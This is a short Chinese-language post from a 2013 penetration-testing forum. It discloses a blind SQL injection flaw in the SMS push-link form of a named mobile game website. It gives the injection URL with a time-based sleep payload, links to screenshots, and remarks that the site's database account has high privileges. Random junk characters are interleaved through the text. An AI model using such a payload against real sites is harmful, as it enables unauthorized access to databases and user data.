中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
' t! @0 H, C" ~( g凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。% j& M; ^6 t- O  c1 S

9 d/ [5 T8 y0 e8 A详细说明:7 N& s" j: k* x  p2 a
存在SQL盲注url:
* `4 S2 ^  `8 ofenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
4 X  _# p' v' t  U/ |http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png2 k  [5 ~! J: D& K2 h, w7 u4 z
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png$ G' W/ a% m' n! @! D$ {4 v) t
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg. R, f; v9 I: {. ~

" ?* h: o3 t# M3 d- p( R! G

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2